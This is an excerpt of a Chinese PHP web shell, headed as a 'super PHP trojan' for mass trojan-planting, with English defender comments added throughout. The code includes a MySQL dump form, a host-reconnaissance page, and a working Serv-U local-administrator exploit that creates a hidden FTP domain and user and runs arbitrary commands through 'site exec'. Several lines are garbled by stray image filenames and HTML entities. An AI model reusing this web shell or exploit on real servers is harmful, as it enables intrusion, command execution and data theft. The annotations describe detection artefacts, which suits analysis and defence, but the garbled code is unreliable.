php8木马误报,我网站被挂木马了悲剧“超级带(批量挂马)PHP木马”

$tb->tableheader();

$tb->formheader($action,'执行 SQL 语句');

$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));

$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));

$tb->makehidden('do','query');

$tb->formfooter('1','30');

}//end sql query

elseif ($_GET['action'] == "sqlbak") {

// Defender note: "sqlbak" branch of the web shell's action dispatcher (the
// if/elseif chain starts outside this excerpt). It takes MySQL connection
// details from the POST body, lists the tables of the named database and
// renders a form that posts do=backupmysql; the dump itself is handled elsewhere.
// $tb is a UI helper object defined outside this excerpt.

$action = '?action=sqlbak';

// Host and user fall back to localhost/root when the form has not been posted.

$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';

$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';

// Read without isset(); the password is handed back to makeinput() below with
// the field-type argument 'text', so it presumably appears in clear in the form.

$dbpassword = $_POST['dbpassword'];

$dbname = $_POST['dbname'];

$tb->tableheader();

$tb->formheader($action,'备份 MySQL 数据库');

$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));

// ext/mysql (mysql_connect, mysql_list_tables, ...) was removed in PHP 7.0, so
// this branch can only work on PHP 5.x hosts. The @ operator suppresses the
// error messages these calls would otherwise raise.

@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);

$tables = @mysql_list_tables($dbname);

// Collect table names keyed by themselves for the multi-select below.

while ($table = @mysql_fetch_row($tables)) {

$cachetables[$table[0]] = $table[0];

}

@mysql_free_result($tables);

// $cachetables is never initialised, so empty() is also true when the
// connection failed or the database has no tables.

if (empty($cachetables)) {

$tb->tdbody('您没有连接数据库 or 当前数据库没有任何数据表');

} else {

// The suggested dump path is built from $pathname (set outside this excerpt)
// and the request's Host header. Hunting hint: look for files ending in
// _MySQL.sql in web-writable directories.

$tb->tdbody('

请选择表:'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
备份数据所保存的路径:'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'
直接下载到本地 (适合数据量较小的数据库)
');

$tb->makehidden('do','backupmysql');

$tb->formfooter('0','30');

}

$tb->tablefooter();

@mysql_close();

}//end sql backup

elseif ($_GET['action'] == "phpenv") {

// Defender note: "phpenv" branch of the web shell. It is a host-reconnaissance
// page: it gathers PHP configuration values, server variables, this file's
// path, free disk space and the availability of extension functions into
// $info and prints them in three groups. It also renders a form that posts
// do=viewphpvar with a free-text setting name (handled outside this excerpt).
// $tb, $dis_func, getphpcfg() and getfun() are defined outside this excerpt;
// from their use here the two helpers appear to report an ini setting and
// whether a function exists — confirm against their definitions.

$user = " 以免crush点此获取当前进程用户名 ";

// Upload limit is shown only when file_uploads is enabled.

$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";

// Admin contact: SERVER_ADMIN if the web server exports it, else sendmail_from.

$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";

// Spaces and commas in the disabled-function list are replaced by line breaks
// for display (any markup in these literals is not present in this listing).

if ($dis_func == "") {

$dis_func = "No";

}else {

$dis_func = str_replace(" ","
",$dis_func);

$dis_func = str_replace(",","
",$dis_func);

}

// eregi() was removed in PHP 7.0, so this line is a fatal error on PHP 7+ if
// the branch is reached. It reports whether "phpinfo" is absent from the
// disabled-function list.

$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";

// Rows 0-12: server facts, 13-24: PHP settings, 25-40: extension checks
// (index ranges taken from the three print loops at the end of this branch).
// Note for review: rows 8, 9 and 19 are damaged in this listing (an HTML
// entity and an image file name sit where the opening of the label string
// should be), so the array literal below does not parse as shown.

$info = array(

0 => array("当前php进程用户",$user),

1 => array("服务器操作系统",PHP_OS),

2 => array("服务器时间",date("Y年m月d日 h:i:s",time())),

3 => array("服务器域名","".$_SERVER['SERVER_NAME'].""),

4 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),

5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),

6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),

7 => array("Web服务端口",$_SERVER['SERVER_PORT']),

8 => array(&quot

5ed169d678b20a33521cc07406290239.gifHP运行方式",strtoupper(php_sapi_name())),

9 => array(&quot

5ed169d678b20a33521cc07406290239.gifHP版本",PHP_VERSION),

10 => array("运行于安全模式",getphpcfg("safemode")),

11 => array("服务器管理员",$adminmail),

12 => array("本文件路径",__FILE__),

13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),

14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),

15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),

16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),

17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),

18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),

19 => array(&quot

5ed169d678b20a33521cc07406290239.gifOST最大字节数 post_max_size",getphpcfg("post_max_size")),

20 => array("允许最大上传文件 upload_max_filesize",$upsize),

21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),

22 => array("被禁用的函数 disable_functions",$dis_func),

23 => array("phpinfo()",$phpinfo),

24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

25 => array("图形处理 GD Library",getfun("imageline")),

26 => array("IMAP电子邮件系统",getfun("imap_close")),

27 => array("MySQL数据库",getfun("mysql_close")),

28 => array("SyBase数据库",getfun("sybase_close")),

29 => array("Oracle数据库",getfun("ora_close")),

30 => array("Oracle 8 数据库",getfun("OCILogOff")),

31 => array("PREL相容语法 PCRE",getfun("preg_match")),

32 => array("PDF文档支持",getfun("pdf_close")),

33 => array("Postgre SQL数据库",getfun("pg_close")),

34 => array("SNMP网络管理协议",getfun("snmpget")),

35 => array("压缩文件支持(Zlib)",getfun("gzclose")),

36 => array("XML解析",getfun("xml_set_object")),

37 => array("FTP",getfun("ftp_login")),

38 => array("ODBC数据库连接",getfun("odbc_close")),

39 => array("Session支持",getfun("session_start")),

40 => array("Socket支持",getfun("fsockopen")),

);

$tb->tableheader();

echo "

\n";

$tb->tdbody('查看PHP配置参数状况','left','1','30','style="padding-left: 5px;"');

$tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');

$tb->makehidden('do','viewphpvar');

echo "

\n";

$hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');

for ($a=0;$a<3;$a++) {

$tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"');

?>

if ($a==0) {

for($i=0;$i<=12;$i++) {

echo "

".$info[$i][0]."".$info[$i][1]."\n";

}

} elseif ($a == 1) {

for ($i=13;$i<=24;$i++) {

echo "

".$info[$i][0]."".$info[$i][1]."\n";

}

} elseif ($a == 2) {

for ($i=25;$i<=40;$i++) {

echo "

".$info[$i][0]."".$info[$i][1]."\n";

}

}

?>

}//for

echo "";

}//end phpenv

elseif($_GET['action'] == "SUExp")

{

// Defender note: "SUExp" branch of the web shell. When the POST body carries
// SUPort, SUUser, SUPass and SUCommand it opens a TCP connection to 127.0.0.1
// on the posted port, logs in with the posted credentials, sends
// "SITE MAINTENANCE" and then registers a temporary FTP domain and user. It
// then connects to that domain on port 2121, logs in as the new user, sends
// the posted command after "site exec", and finally deletes the domain.
// Every request and reply line is echoed into the page.
//
// Artefacts visible in this code that are useful for detection:
//   - a domain named "haxorcitos" bound to 0.0.0.0 port 2121;
//   - an FTP account "Will_Be" with the same password and home directory c:\;
//   - loopback connections from the web server process to an FTP service;
//   - the strings "-SETDOMAIN", "-SETUSERSETUP", "-DELETEDOMAIN" and
//     "site exec" in PHP files under the web root.
// The trailing form text names the target as the Serv-U local administrator
// account. Hardening that addresses this path: non-default credentials for
// that account, a patched FTP server, and not exposing fsockopen() to web
// PHP where it is not needed — verify what applies to the host in question.

if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "" && $_POST['SUCommand'])

{

echo "

";

$sendbuf = "";

$recvbuf = "";

// Payload that defines the temporary domain (name, bind address, port 2121).

$domain  = "-SETDOMAIN\r\n".

"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".

"-TZOEnable=0\r\n".

" TZOKey=\r\n";

// Payload that defines the temporary user inside that domain; HomeDir and
// the Access line both point at c:\.

$adduser = "-SETUSERSETUP\r\n".

"-IP=0.0.0.0\r\n".

"-PortNo=2121\r\n".

"-User=Will_Be\r\n".

"-Password=Will_Be\r\n".

"-HomeDir=c:\\\r\n".

"-LoginMesFile=\r\n".

"-Disable=0\r\n".

"-RelPaths=1\r\n".

"-NeedSecure=0\r\n".

"-HideHidden=0\r\n".

"-AlwaysAllowLogin=0\r\n".

"-ChangePassword=0\r\n".

"-QuotaEnable=0\r\n".

"-MaxUsersLoginPerIP=-1\r\n".

"-SpeedLimitUp=0\r\n".

"-SpeedLimitDown=0\r\n".

"-MaxNrUsers=-1\r\n".

"-IdleTimeOut=600\r\n".

"-SessionTimeOut=-1\r\n".

"-Expire=0\r\n".

"-RatioUp=1\r\n".

"-RatioDown=1\r\n".

"-RatiosCredit=0\r\n".

"-QuotaCurrent=0\r\n".

"-QuotaMaximum=0\r\n".

"-Maintenance=None\r\n".

"-PasswordType=Regular\r\n".

"-Ratios=None\r\n".

" Access=c:\\|RELP\r\n";

// Payload that removes the temporary domain again at the end of the run.

$deldomain="-DELETEDOMAIN\r\n".

"-IP=0.0.0.0\r\n".

" PortNo=2121\r\n";

// Call-time pass-by-reference (&$errno, &$errstr) has been a fatal error since
// PHP 5.4, so a file containing this line does not compile on PHP 5.4 or later.
// The return value is not checked before it is read from.

$sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

// Login to the administration connection with the posted credentials.

$sendbuf = "USER ".$_POST["SUUser"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "SITE MAINTENANCE\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

// Register the temporary domain, then the temporary user.

$sendbuf = $domain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = $adduser;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Exploit ...
";

echo "**********************************************************
";

// Second connection: to the temporary domain on port 2121, as the new user.

$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "USER Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

// The posted command is forwarded verbatim; it presumably runs under the FTP
// service's account rather than the web server's — confirm per host.

$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: site exec ".$_POST["SUCommand"]."
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Delete Domain ...
";

echo "**********************************************************
";

// Clean-up on the administration connection: the temporary domain is removed,
// so the listener on port 2121 exists only for the duration of the request.
// FTP server logs of domain creation and deletion are the durable trace.

$sendbuf = $deldomain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

echo "

";

fclose($sock);

fclose($exp);

}

?>

通过Serv-U 本地管理员帐号执行命令
LocalPort:

LocalUser:

        LocalPass:

Command :

}

?>

?>


超级PHP木马带批量挂马.<?php

// debuginfo() is defined outside this excerpt; what it prints cannot be
// confirmed from here.

debuginfo();

// Flushes the active output buffer and turns it off, so the page is sent at
// this point. This implies output buffering was started earlier in the file
// (not visible in this excerpt).

ob_end_flush();

?>
